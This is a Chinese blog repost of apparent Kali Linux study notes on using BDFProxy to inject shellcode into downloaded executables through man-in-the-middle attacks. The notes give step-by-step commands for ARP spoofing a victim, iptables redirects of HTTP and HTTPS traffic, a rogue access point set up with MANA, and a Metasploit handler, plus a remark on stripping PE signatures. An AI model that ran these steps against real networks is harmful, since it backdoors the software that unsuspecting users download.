kali linux之Bdfproxy

最新推荐文章于 2024-04-23 10:04:21 发布
最新推荐文章于 2024-04-23 10:04:21 发布
阅读量347 收藏 1
点赞数
文章标签: 开发工具 网络 运维
原文链接:http://www.cnblogs.com/Hydraxx/p/10478517.html
版权

Bdfproxy(mitmproxy)

基于流量劫持动态注入shellcode(arp欺骗,dns欺骗,流氓ap)

 

步骤:

开启流量转发---------sysctl -w net.ipv4.ip_forward=1

配置iptables策略

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080(80端口的流量转发到8080端口)

iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080(443端口的流量转发到8080端口)

 

更改配置为透明代理,并修改所有侦听地址

vim /etc/bdfproxy/bdfproxy.cfg

proxyMode = transparent

 

启动Bdfproxy

 

 

arpspoof -i eth0 -t 192.168.1.12 192.168.1.1

 

 

启动msf

 

 

 

 

修改无线 SSID 名称

 vim /etc/mana-toolkit/hostapd-mana.conf


./usr/share/mana-toolkit/run-mana/start-nat-simple.sh

修改 wlan1 无线网卡适配器并启动
iptables -t nat -A PREROUTING -i $phy -p tcp –dport 80/443 -j REDIRECT –to-port 8080

修改侦听 IP 地址并启动 badfproxy
vim /etc/bdfproxy/bdfproxy.cfg
proxyMode = transparent

启动 msf

msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc

 

补充内容
    全站 HTTPS 防注入(微软每个补丁都带码)
    PE 文件证书签名可被清除
    PE Header -> Optional Header -> Certificate Table(Address and size)
        全部用 0 覆盖
        BDF 默认清除数字签名

 

 

 

 

友情链接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn

 

转载于:https://www.cnblogs.com/Hydraxx/p/10478517.html

放错位的天才
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BDFProxy-ng:重写BDFProxy(https
05-23
#The Backdoor Factory Proxy NextGen(BDFProxy-ng)v0.1 bdfproxy-ng是一个分支并回顾了原始BDFProxy( ) ##什么是新的 添加了对deb文件的支持(Debian和Ubuntu) 增加了对ar和xz存档的支持 增加了对mime类型而不是标头的支持 摆脱了各种库来处理不同的存档类型,只支持一种( libarchive-c ) 重构代码,添加更强大的检查 更改了版权:现在是GPL3! ##为什么要分叉,我觉得代码需要进行适当的重新设计才能添加更多功能。 另外,我不喜欢原始项目的版权:) ##如何安装您需要安装requirements.txt列出的python软件包(提示: sudo pip install -r requirements.txt )。 在此之前,您需要从数据包管理器中安装libarchive-dev
Kali linux 学习笔记(八十五)免杀——Bdfproxy 2020.4.21
闵行小鱼塘
04-21 1158
本节学习bdfproxy
kali开启流量转发进行流量分析
qq_51836189的博客
10-26 1193
kali开启流量转发后靶机仍然断网的处理方式
BDFProxy
cnbird's blog
09-17 2268
https://hackmag.com/security/bdfproxy/ https://github.com/secretsquirrel/BDFProxy
渗透测试-----10-免杀
weixin_62693307的博客
02-04 250
与其他工具不同的是,他不会增加软件的大小,而是利用代码缝隙进行注入,免杀效果更好。基于流量劫持(中间人攻击)动态注入shellcode(ARP spoof、DNSspoof、Fake AP)远程访问特洛伊木马是一种恶意软件,能够让黑客监视和控制您的计算机、网络设备甚至整个网络。运行时分片分段的解密执行,注入进程火AV不检查的无害文件中。Veil-evasion(Veil-framework框架的一部分)使用正常的exe文件作为模板,将payload代码加入模板内。找到触发AV查杀的精确字符串,并将其修改。
Instant Kali Linux
11-22
Get to grips with a new technology, understand what it is... The book is written is simple technical language which requires only a basic knowledge of security assessments and the Linux operating system.
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具...
KaLi Linux中文指南
10-08
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写...
kali linux
09-30
kali linux种子文件 kali linux种子文件 kali linux种子文件 kali linux种子文件
kali linux安装教程.pdf
02-29
Kali Linux是一个基于Debian的Linux发行版,它主要用于数字取证和渗透测试。Kali linux预装了许多渗透测试软件,包括nmap、Wireshark、John the Ripper以及Aircrack-ng等。用户可以通过硬盘、live CD或live USB运行...
脚本小子攻防
08-01
脚本攻防,比较老了,不过学习基本思路还是不错的。
BDFProxy:通过MITM修补程序二进制文件
04-01
BDFProxy的新版本将于2021年7月发布,仅向赞助商提供! 赞助者在这里: : 博客: : 后门工厂代理(BDFProxy)v0.3.8 仅适用于安全专业人员和研究人员。 ###现在仅适用于v.0.17> = MITMPROXY> = v.0.11 码头工人: # sudo echo 1 > /proc/sys/net/ipv4/ip_forward # linux # sudo sysctl -w net.inet.ip.forwarding=1 # macOS docker pull secretsquirrel/bdfproxy docker run -it -p 8080:8080 secretsquirrel/bdfproxy bash # ./bdf_proxy.py 要在Kali上安装: apt-get update apt-get inst
kali菜单中各工具功能
weixin_34138056的博客
04-08 3706
一、说明 各工具kali官方简介(竖排):https://tools.kali.org/tools-listing 安装kali虚拟机可参考:https://www.cnblogs.com/lsdb/p/6500757.html pentestbox:虚拟机还是比较耗内存的,内存不够可以试试pentestbox,从功能上可以理解为运行在windows上的kali发行版,kali主流工具它都具备。...
Kali Linux渗透测试 138 后门工具--Bdfproxy
kevinhanser
04-13 1805
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 Bdfproxy(mitmproxy)基于流量劫持(中间人攻击)动态注入 shellcode (ARP spoof、DNS spoof、Fake AP) 步骤sysctl -w net.ipv4.
bdfproxy&&mitmproxy版本问题
robacco的博客
03-18 259
一、bdfproxy介绍: msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc 问题开启arp欺骗之后靶机不能上网 ,下载不了。exe文件???? 解决:使用IE浏览器,不用360浏览器。 问题2:如下图后门注入失败,原因是无法读取后门证书文件。 解决:无法读取证书文件,解决方法: 备份并重命名 ro...
内网劫持渗透利器——MITMf指南
linvex的专栏
10-03 5683
0x01 题记 又是一年十月一,想到小伙伴们都纷纷出门旅游,皆有美酒佳人相伴,再看看我。。。 这张图不是为了发的,是为了让你们看的!谴责你们这些不带我玩儿的!! 哎,不禁潸然泪下。 子曰:“长得丑就要多读书!” 于是有了这篇文章。。。 0x02 闲话少说,进正题 这篇文章的主要目的是介绍一下一个最新的中间人攻击框架,MI
【解决NodeJS项目无法在IDEA中调试的问题】使用JetBrains IDEA 2023 调试nodejs项目
最新发布
宅斗士的博客
04-23 414
项目采用Ant Design Pro + React,使用前后端分离开发方式,后端可以很容易的打断点调试,但是前端用到了React脚手架,在IDEA中加了调试断点,但是没有什么用处。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值